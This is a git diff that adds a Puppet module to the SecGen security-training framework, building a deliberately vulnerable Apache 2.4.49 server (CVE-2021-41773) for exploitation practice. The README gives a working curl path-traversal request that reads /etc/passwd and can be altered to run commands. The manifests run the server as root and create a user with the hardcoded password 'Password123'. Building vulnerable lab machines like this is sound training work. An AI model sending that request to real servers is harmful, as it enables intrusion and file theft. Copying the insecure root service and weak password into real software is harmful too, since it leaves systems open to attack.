diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/README b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/README new file mode 100644 index 000000000..aea703a87 --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/README @@ -0,0 +1,37 @@ +Tested on Debian GNU/Linux 11 (bullseye). +STATUS: Fully working. + + +Simple Puppet module to install and configure the vulnerable Apache 2.4.49 to help individuals practice their exploitation skills. +Additionally, this module will hopefully be implimented into SecGen (https://github.com/cliffe/SecGen). + + +Quick way to exploit: + - curl -s --path-as-is -d "echo Content-Type: text/plain; echo;" "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + Can change '/etc/passwd' to a command or anything else really. + +File Locations: + + Installer Location: + - /opt/Apache_2.4.49/ + + Binary Location: + - /usr/local/apache2/bin + + Config location: + - /usr/local/apache2/conf + + Web Pages: + - /usr/local/apache2/htdocs + + Service file location: + - /etc/systemd/system/httpd.service + +Exploit Link: +https://www.exploit-db.com/exploits/50383 + +Sources/Links: +https://www.linuxfromscratch.org/blfs/view/svn/server/apache.html - Proved to be helpful but also very unhelpful. +https://www.exploit-db.com/apps/1edb1895661473ea530209e29b83a982-httpd-2.4.49.tar.gz - Vulnerable version of the Application. +https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - CVE details. +https://github.com/cliffe/SecGen - SecGen by Cliffe Schreuders. \ No newline at end of file diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution.pp b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution.pp new file mode 100644 index 000000000..832166b4c --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution.pp @@ -0,0 +1,3 @@ +include apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::install +include apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::config +include apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::service diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd-2.4.49.tar.gz b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd-2.4.49.tar.gz new file mode 100644 index 000000000..a282682aa Binary files /dev/null and b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd-2.4.49.tar.gz differ diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.conf b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.conf new file mode 100644 index 000000000..18bdbd71c --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.conf @@ -0,0 +1,511 @@ +# This is the Apache Web Server configuration file, +# lines 203 to 206 and 353 to 357 were modified the rest is default. +# +# +# +# +# This is the main Apache HTTP server configuration file. It contains the +# configuration directives that give the server its instructions. +# See for detailed information. +# In particular, see +# +# for a discussion of each configuration directive. +# +# Do NOT simply read the instructions in here without understanding +# what they do. They're here only as hints or reminders. If you are unsure +# consult the online docs. You have been warned. +# +# Configuration and logfile names: If the filenames you specify for many +# of the server's control files begin with "/" (or "drive:/" for Win32), the +# server will use that explicit path. If the filenames do *not* begin +# with "/", the value of ServerRoot is prepended -- so "logs/access_log" +# with ServerRoot set to "/usr/local/apache2" will be interpreted by the +# server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log" +# will be interpreted as '/logs/access_log'. + +# +# ServerRoot: The top of the directory tree under which the server's +# configuration, error, and log files are kept. +# +# Do not add a slash at the end of the directory path. If you point +# ServerRoot at a non-local disk, be sure to specify a local disk on the +# Mutex directive, if file-based mutexes are used. If you wish to share the +# same ServerRoot for multiple httpd daemons, you will need to change at +# least PidFile. +# +ServerRoot "/usr/local/apache2" + +# +# Mutex: Allows you to set the mutex mechanism and mutex file directory +# for individual mutexes, or change the global defaults +# +# Uncomment and change the directory if mutexes are file-based and the default +# mutex file directory is not on a local disk or is not appropriate for some +# other reason. +# +# Mutex default:logs + +# +# Listen: Allows you to bind Apache to specific IP addresses and/or +# ports, instead of the default. See also the +# directive. +# +# Change this to Listen on specific IP addresses as shown below to +# prevent Apache from glomming onto all bound IP addresses. +# +#Listen 12.34.56.78:80 +Listen 80 + +# +# Dynamic Shared Object (DSO) Support +# +# To be able to use the functionality of a module which was built as a DSO you +# have to place corresponding `LoadModule' lines at this location so the +# directives contained in it are actually available _before_ they are used. +# Statically compiled modules (those listed by `httpd -l') do not need +# to be loaded here. +# +# Example: +# LoadModule foo_module modules/mod_foo.so +# +LoadModule authn_file_module modules/mod_authn_file.so +#LoadModule authn_dbm_module modules/mod_authn_dbm.so +#LoadModule authn_anon_module modules/mod_authn_anon.so +#LoadModule authn_dbd_module modules/mod_authn_dbd.so +#LoadModule authn_socache_module modules/mod_authn_socache.so +LoadModule authn_core_module modules/mod_authn_core.so +LoadModule authz_host_module modules/mod_authz_host.so +LoadModule authz_groupfile_module modules/mod_authz_groupfile.so +LoadModule authz_user_module modules/mod_authz_user.so +#LoadModule authz_dbm_module modules/mod_authz_dbm.so +#LoadModule authz_owner_module modules/mod_authz_owner.so +#LoadModule authz_dbd_module modules/mod_authz_dbd.so +LoadModule authz_core_module modules/mod_authz_core.so +#LoadModule authnz_ldap_module modules/mod_authnz_ldap.so +LoadModule access_compat_module modules/mod_access_compat.so +LoadModule auth_basic_module modules/mod_auth_basic.so +#LoadModule auth_form_module modules/mod_auth_form.so +#LoadModule auth_digest_module modules/mod_auth_digest.so +#LoadModule allowmethods_module modules/mod_allowmethods.so +#LoadModule file_cache_module modules/mod_file_cache.so +#LoadModule cache_module modules/mod_cache.so +#LoadModule cache_disk_module modules/mod_cache_disk.so +#LoadModule cache_socache_module modules/mod_cache_socache.so +#LoadModule socache_shmcb_module modules/mod_socache_shmcb.so +#LoadModule socache_dbm_module modules/mod_socache_dbm.so +#LoadModule socache_memcache_module modules/mod_socache_memcache.so +#LoadModule socache_redis_module modules/mod_socache_redis.so +#LoadModule watchdog_module modules/mod_watchdog.so +#LoadModule macro_module modules/mod_macro.so +#LoadModule dbd_module modules/mod_dbd.so +#LoadModule dumpio_module modules/mod_dumpio.so +#LoadModule buffer_module modules/mod_buffer.so +#LoadModule ratelimit_module modules/mod_ratelimit.so +LoadModule reqtimeout_module modules/mod_reqtimeout.so +#LoadModule ext_filter_module modules/mod_ext_filter.so +#LoadModule request_module modules/mod_request.so +#LoadModule include_module modules/mod_include.so +LoadModule filter_module modules/mod_filter.so +#LoadModule substitute_module modules/mod_substitute.so +#LoadModule sed_module modules/mod_sed.so +LoadModule mime_module modules/mod_mime.so +#LoadModule ldap_module modules/mod_ldap.so +LoadModule log_config_module modules/mod_log_config.so +#LoadModule log_debug_module modules/mod_log_debug.so +#LoadModule logio_module modules/mod_logio.so +LoadModule env_module modules/mod_env.so +#LoadModule expires_module modules/mod_expires.so +LoadModule headers_module modules/mod_headers.so +#LoadModule unique_id_module modules/mod_unique_id.so +LoadModule setenvif_module modules/mod_setenvif.so +LoadModule version_module modules/mod_version.so +#LoadModule remoteip_module modules/mod_remoteip.so +#LoadModule proxy_module modules/mod_proxy.so +#LoadModule proxy_connect_module modules/mod_proxy_connect.so +#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so +#LoadModule proxy_http_module modules/mod_proxy_http.so +#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so +#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so +#LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so +#LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so +#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so +#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so +#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so +#LoadModule proxy_express_module modules/mod_proxy_express.so +#LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so +#LoadModule session_module modules/mod_session.so +#LoadModule session_cookie_module modules/mod_session_cookie.so +#LoadModule session_crypto_module modules/mod_session_crypto.so +#LoadModule session_dbd_module modules/mod_session_dbd.so +#LoadModule slotmem_shm_module modules/mod_slotmem_shm.so +#LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so +#LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so +#LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so +#LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so +LoadModule unixd_module modules/mod_unixd.so +#LoadModule dav_module modules/mod_dav.so +LoadModule status_module modules/mod_status.so +LoadModule autoindex_module modules/mod_autoindex.so +#LoadModule info_module modules/mod_info.so +#LoadModule cgid_module modules/mod_cgid.so +#LoadModule dav_fs_module modules/mod_dav_fs.so +#LoadModule vhost_alias_module modules/mod_vhost_alias.so +#LoadModule negotiation_module modules/mod_negotiation.so +LoadModule dir_module modules/mod_dir.so +#LoadModule actions_module modules/mod_actions.so +#LoadModule speling_module modules/mod_speling.so +#LoadModule userdir_module modules/mod_userdir.so +LoadModule alias_module modules/mod_alias.so +#LoadModule rewrite_module modules/mod_rewrite.so + + +# +# If you wish httpd to run as a different user or group, you must run +# httpd as root initially and it will switch. +# +# User/Group: The name (or #number) of the user/group to run httpd as. +# It is usually good practice to create a dedicated user and group for +# running httpd, as with most system services. +# +User daemon +Group daemon + + + +# 'Main' server configuration +# +# The directives in this section set up the values used by the 'main' +# server, which responds to any requests that aren't handled by a +# definition. These values also provide defaults for +# any containers you may define later in the file. +# +# All of these directives may appear inside containers, +# in which case these default settings will be overridden for the +# virtual host being defined. +# + +# +# ServerAdmin: Your address, where problems with the server should be +# e-mailed. This address appears on some server-generated pages, such +# as error documents. e.g. admin@your-domain.com +# +ServerAdmin you@example.com + +# +# ServerName gives the name and port that the server uses to identify itself. +# This can often be determined automatically, but we recommend you specify +# it explicitly to prevent problems during startup. +# +# If your host doesn't have a registered DNS name, enter its IP address here. +# +#ServerName www.192.168.8.191.com:80 + +# +# Deny access to the entirety of your server's filesystem. You must +# explicitly permit access to web content directories in other +# blocks below. +# +# +# AllowOverride none +# Require all denied +# + +# +# Note that from this point forward you must specifically allow +# particular features to be enabled - so if something's not working as +# you might expect, make sure that you have specifically enabled it +# below. +# + +# +# DocumentRoot: The directory out of which you will serve your +# documents. By default, all requests are taken from this directory, but +# symbolic links and aliases may be used to point to other locations. +# +DocumentRoot "/usr/local/apache2/htdocs" + + # + # Possible values for the Options directive are "None", "All", + # or any combination of: + # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews + # + # Note that "MultiViews" must be named *explicitly* --- "Options All" + # doesn't give it to you. + # + # The Options directive is both complicated and important. Please see + # http://httpd.apache.org/docs/2.4/mod/core.html#options + # for more information. + # + Options Indexes FollowSymLinks + + # + # AllowOverride controls what directives may be placed in .htaccess files. + # It can be "All", "None", or any combination of the keywords: + # AllowOverride FileInfo AuthConfig Limit + # + AllowOverride None + + # + # Controls who can get stuff from this server. + # + Require all granted + + +# +# DirectoryIndex: sets the file that Apache will serve if a directory +# is requested. +# + + DirectoryIndex index.html + + +# +# The following lines prevent .htaccess and .htpasswd files from being +# viewed by Web clients. +# + + Require all denied + + +# +# ErrorLog: The location of the error log file. +# If you do not specify an ErrorLog directive within a +# container, error messages relating to that virtual host will be +# logged here. If you *do* define an error logfile for a +# container, that host's errors will be logged there and not here. +# +ErrorLog "logs/error_log" + +# +# LogLevel: Control the number of messages logged to the error_log. +# Possible values include: debug, info, notice, warn, error, crit, +# alert, emerg. +# +LogLevel warn + + + # + # The following directives define some format nicknames for use with + # a CustomLog directive (see below). + # + LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined + LogFormat "%h %l %u %t \"%r\" %>s %b" common + + + # You need to enable mod_logio.c to use %I and %O + LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio + + + # + # The location and format of the access logfile (Common Logfile Format). + # If you do not define any access logfiles within a + # container, they will be logged here. Contrariwise, if you *do* + # define per- access logfiles, transactions will be + # logged therein and *not* in this file. + # + CustomLog "logs/access_log" common + + # + # If you prefer a logfile with access, agent, and referer information + # (Combined Logfile Format) you can use the following directive. + # + #CustomLog "logs/access_log" combined + + + + # + # Redirect: Allows you to tell clients about documents that used to + # exist in your server's namespace, but do not anymore. The client + # will make a new request for the document at its new location. + # Example: + # Redirect permanent /foo http://www.example.com/bar + + # + # Alias: Maps web paths into filesystem paths and is used to + # access content that does not live under the DocumentRoot. + # Example: + # Alias /webpath /full/filesystem/path + # + # If you include a trailing / on /webpath then the server will + # require it to be present in the URL. You will also likely + # need to provide a section to allow access to + # the filesystem path. + + # + # ScriptAlias: This controls which directories contain server scripts. + # ScriptAliases are essentially the same as Aliases, except that + # documents in the target directory are treated as applications and + # run by the server when requested rather than as documents sent to the + # client. The same rules about trailing "/" apply to ScriptAlias + # directives as to Alias. + # + ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/" + + + + + # + # ScriptSock: On threaded servers, designate the path to the UNIX + # socket used to communicate with the CGI daemon of mod_cgid. + # + #Scriptsock cgisock + + +# +# "/usr/local/apache2/cgi-bin" should be changed to whatever your ScriptAliased +# CGI directory exists, if you have that configured. +# + + # AllowOverride None + #Options None + Require all granted + + + + # + # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied + # backend servers which have lingering "httpoxy" defects. + # 'Proxy' request header is undefined by the IETF, not listed by IANA + # + RequestHeader unset Proxy early + + + + # + # TypesConfig points to the file containing the list of mappings from + # filename extension to MIME-type. + # + TypesConfig conf/mime.types + + # + # AddType allows you to add to or override the MIME configuration + # file specified in TypesConfig for specific file types. + # + #AddType application/x-gzip .tgz + # + # AddEncoding allows you to have certain browsers uncompress + # information on the fly. Note: Not all browsers support this. + # + #AddEncoding x-compress .Z + #AddEncoding x-gzip .gz .tgz + # + # If the AddEncoding directives above are commented-out, then you + # probably should define those extensions to indicate media types: + # + AddType application/x-compress .Z + AddType application/x-gzip .gz .tgz + + # + # AddHandler allows you to map certain file extensions to "handlers": + # actions unrelated to filetype. These can be either built into the server + # or added with the Action directive (see below) + # + # To use CGI scripts outside of ScriptAliased directories: + # (You will also need to add "ExecCGI" to the "Options" directive.) + # + #AddHandler cgi-script .cgi + + # For type maps (negotiated resources): + #AddHandler type-map var + + # + # Filters allow you to process content before it is sent to the client. + # + # To parse .shtml files for server-side includes (SSI): + # (You will also need to add "Includes" to the "Options" directive.) + # + #AddType text/html .shtml + #AddOutputFilter INCLUDES .shtml + + +# +# The mod_mime_magic module allows the server to use various hints from the +# contents of the file itself to determine its type. The MIMEMagicFile +# directive tells the module where the hint definitions are located. +# +#MIMEMagicFile conf/magic + +# +# Customizable error responses come in three flavors: +# 1) plain text 2) local redirects 3) external redirects +# +# Some examples: +#ErrorDocument 500 "The server made a boo boo." +#ErrorDocument 404 /missing.html +#ErrorDocument 404 "/cgi-bin/missing_handler.pl" +#ErrorDocument 402 http://www.example.com/subscription_info.html +# + +# +# MaxRanges: Maximum number of Ranges in a request before +# returning the entire resource, or one of the special +# values 'default', 'none' or 'unlimited'. +# Default setting is to accept 200 Ranges. +#MaxRanges unlimited + +# +# EnableMMAP and EnableSendfile: On systems that support it, +# memory-mapping or the sendfile syscall may be used to deliver +# files. This usually improves server performance, but must +# be turned off when serving from networked-mounted +# filesystems or if support for these functions is otherwise +# broken on your system. +# Defaults: EnableMMAP On, EnableSendfile Off +# +#EnableMMAP off +#EnableSendfile on + +# Supplemental configuration +# +# The configuration files in the conf/extra/ directory can be +# included to add extra features or to modify the default configuration of +# the server, or you may simply copy their contents here and change as +# necessary. + +# Server-pool management (MPM specific) +#Include conf/extra/httpd-mpm.conf + +# Multi-language error messages +#Include conf/extra/httpd-multilang-errordoc.conf + +# Fancy directory listings +#Include conf/extra/httpd-autoindex.conf + +# Language settings +#Include conf/extra/httpd-languages.conf + +# User home directories +#Include conf/extra/httpd-userdir.conf + +# Real-time info on requests and configuration +#Include conf/extra/httpd-info.conf + +# Virtual hosts +#Include conf/extra/httpd-vhosts.conf + +# Local access to the Apache HTTP Server Manual +#Include conf/extra/httpd-manual.conf + +# Distributed authoring and versioning (WebDAV) +#Include conf/extra/httpd-dav.conf + +# Various default settings +#Include conf/extra/httpd-default.conf + +# Configure mod_proxy_html to understand HTML4/XHTML1 + +Include conf/extra/proxy-html.conf + + +# Secure (SSL/TLS) connections +#Include conf/extra/httpd-ssl.conf +# +# Note: The following must must be present to support +# starting without SSL on platforms with no /dev/random equivalent +# but a statically compiled-in mod_ssl. +# + +SSLRandomSeed startup builtin +SSLRandomSeed connect builtin + + diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.service b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.service new file mode 100644 index 000000000..fd40e08b2 --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/httpd.service @@ -0,0 +1,16 @@ +# Custom Apache Web Server service file. +[Unit] +Description=Apache HTTPD 2.4.49 Web Server +After=network.target +StartLimitIntervalSec=0 + +[Service] +Type=simple +Restart=always +RestartSec=1 +User=root +ExecStart=/usr/local/apache2/bin/httpd +WorkingDirectory=/usr/local/apache2/bin/ + +[Install] +WantedBy=multi-user.target \ No newline at end of file diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/index.html b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/index.html new file mode 100644 index 000000000..a7f1ba18e --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/files/index.html @@ -0,0 +1,10 @@ + + + +

It works!

+

Apache 2.4.49 Server.

+ + diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/config.pp b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/config.pp new file mode 100644 index 000000000..b254c6d32 --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/config.pp @@ -0,0 +1,56 @@ +# +class apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::config { + Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] } + $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file) + $user = 'websvr' + $user_home = "/home/${user}" + $install_dir = '/opt/Apache_2.4.49' + $webpage_dir = '/usr/local/apache2/htdocs' + $config_dir = '/usr/local/apache2/conf' + $service_file_dir = '/etc/systemd/system' + + # Create user account. + user { $user: + ensure => 'present', + uid => '666', + gid => 'root',# + home => $user_home, + password => 'Password123', + managehome => true, + require => Package['pcre2-utils'], + notify => File[$install_dir], + } + + # Remove current config. + exec { 'remove-config': + command => "sudo rm -f ${config_dir}/httpd.conf", + require => Exec['make-install'], + notify => Exec['remove-default-index'], + } + + # Remove default index.html. + exec { 'remove-default-index': + command => "sudo rm -f ${webpage_dir}/index.html", + require => Exec['remove-config'], + notify => File["${webpage_dir}/index.html"], + } + + # Add webpage. /usr/local/apache2/htdocs + file { "${webpage_dir}/index.html": + mode => '0755', + owner => $user, + source => 'puppet:///modules/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/index.html', + require => Exec['remove-default-index'], + notify => File["${config_dir}/httpd.conf"], + } + + # Copy httpd.conf configuration file to /usr/local/apache2/conf/httpd.conf + file { "${config_dir}/httpd.conf": + mode => '0755', + owner => $user, + source => 'puppet:///modules/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/httpd.conf', + require => File["${webpage_dir}/index.html"], + notify => File["${service_file_dir}/httpd.service"], + } + # Execution now passed to the service.pp file. +} diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/install.pp b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/install.pp new file mode 100644 index 000000000..ed561d08a --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/install.pp @@ -0,0 +1,93 @@ +# +class apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::install { + Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] } + $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file) + $user = 'websvr' + $install_dir = '/opt/Apache_2.4.49' + + +# Install dependancies build-essential, libpcre3, libpcre3-dev, libapr1-dev, libaprutil1-dev & pcre2-utils. + package { 'build-essential': + ensure => installed, + notify => Package['libpcre3'], + } + package { 'libpcre3': + ensure => installed, + require => Package['build-essential'], + notify => Package['libpcre3-dev'], + } + package { 'libpcre3-dev': + ensure => installed, + require => Package['libpcre3'], + notify => Package['libapr1-dev'], + } + package { 'libapr1-dev': + ensure => installed, + require => Package['libpcre3-dev'], + notify => Package['libaprutil1-dev'], + } + package { 'libaprutil1-dev': + ensure => installed, + require => Package['libapr1-dev'], + notify => Package['pcre2-utils'], + } + package { 'pcre2-utils': + ensure => installed, + require => Package['libaprutil1-dev'], + notify => User[$user], + } + + # Create install directory. + file { $install_dir: + ensure => 'directory', + owner => $user, + mode => '0755', + require => User[$user], + notify => File["${install_dir}/httpd-2.4.49.tar.gz"], + } + + # Move tar ball to /opt/Apache_2.4.49/ directory. + file { "${install_dir}/httpd-2.4.49.tar.gz": + owner => $user, + mode => '0755', + source => 'puppet:///modules/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/httpd-2.4.49.tar.gz', + require => File[$install_dir], + notify => Exec['mellow-file'], + } + + # Extract tar ball. + exec { 'mellow-file': + command => 'sudo tar -xzvf httpd-2.4.49.tar.gz', + cwd => $install_dir, + creates => "${install_dir}/httpd-2.4.49/", + require => File["${install_dir}/httpd-2.4.49.tar.gz"], + notify => Exec['configure'], + } + + # In /httpd-2.4.49/ run sudo ./configure. + exec { 'configure': + command => 'sudo ./configure', + cwd => "${install_dir}/httpd-2.4.49/", + require => Exec['mellow-file'], + notify => Exec['make'], + } + + # sudo make. + # Compile binaries. + exec { 'make': + command => 'sudo make', + cwd => "${install_dir}/httpd-2.4.49/", + require => Exec['configure'], + notify => Exec['make-install'], + } + + # sudo make install. + # Install application from compiled binaries. + exec { 'make-install': + command => 'sudo make install', + cwd => "${install_dir}/httpd-2.4.49/", + require => Exec['make'], + notify => Exec['remove-config'], + } + # Execution now passes to the config.pp file. +} diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/service.pp b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/service.pp new file mode 100644 index 000000000..b4692dd0e --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/manifests/service.pp @@ -0,0 +1,42 @@ +# +class apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution::service { + Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] } + $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file) + $config_dir = '/usr/local/apache2/conf' + $service_file_dir = '/etc/systemd/system' + $bin_dir = '/usr/local/apache2/bin' + + # Move service file to correct location. + file { "${service_file_dir}/httpd.service": + ensure => present, + source => 'puppet:///modules/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/httpd.service', + owner => 'root', + mode => '0777', + require => File["${config_dir}/httpd.conf"], + notify => Exec['start-httpd'], + } + + # Start httpd service. + exec { 'start-httpd': + command => 'sudo ./httpd', + cwd => $bin_dir, + require => File["${service_file_dir}/httpd.service"], + notify => Cron['start-httpd-cron'], + } + + # Create Cron job to start the Apache service after system reboot. + cron { 'start-httpd-cron': + command => "sudo ${bin_dir}/httpd", + special => 'reboot', + require => Exec['start-httpd'], + notify => Service['httpd'], + } + + # Make sure the Apache service is running. + service { 'httpd': + ensure => 'running', + enable => true, + require => File["${service_file_dir}/httpd.service"], + } + # End of Module. +} diff --git a/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/secgen_metadata.xml b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/secgen_metadata.xml new file mode 100644 index 000000000..e8d549f94 --- /dev/null +++ b/modules/vulnerabilities/unix/http/apache_http_server_2_4_4_9_path_traversal_and_remote_code_execution/secgen_metadata.xml @@ -0,0 +1,71 @@ + + + + Apache HTTP Server 2.4.49 Path Traversal and RCE + Anaas Naveed + Thomas Shaw + MIT + TODO + + http + root_rwx + remote + linux + low + + port + strings_to_leak + leaked_filenames + strings_to_pre_leak + + + + + + + + + + + + + + + + + + + CVE-2021-41773 + 4.3 + AV:N/AC:M/Au:N/C:P/I:N/A:N + https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + https://www.exploit-db.com/apps/1edb1895661473ea530209e29b83a982-httpd-2.4.49.tar.gz + apache2 + GPLv2 + + + + update + + + + + + server-side misconfiguration and vulnerable components + Directory traversal + + + EXPLOITATION + EXPLOITATION FRAMEWORKS + DIRECTORY TRAVERSAL + + + CVEs and CWEs + + + PENETRATION TESTING - SOFTWARE TOOLS + PENETRATION TESTING - ACTIVE PENETRATION + + diff --git a/scenarios/examples/vulnerability_examples/apache_http_server_2_4_4_9.xml b/scenarios/examples/vulnerability_examples/apache_http_server_2_4_4_9.xml new file mode 100644 index 000000000..98fddf2e1 --- /dev/null +++ b/scenarios/examples/vulnerability_examples/apache_http_server_2_4_4_9.xml @@ -0,0 +1,16 @@ + + + + + + web_server + + + + + + + +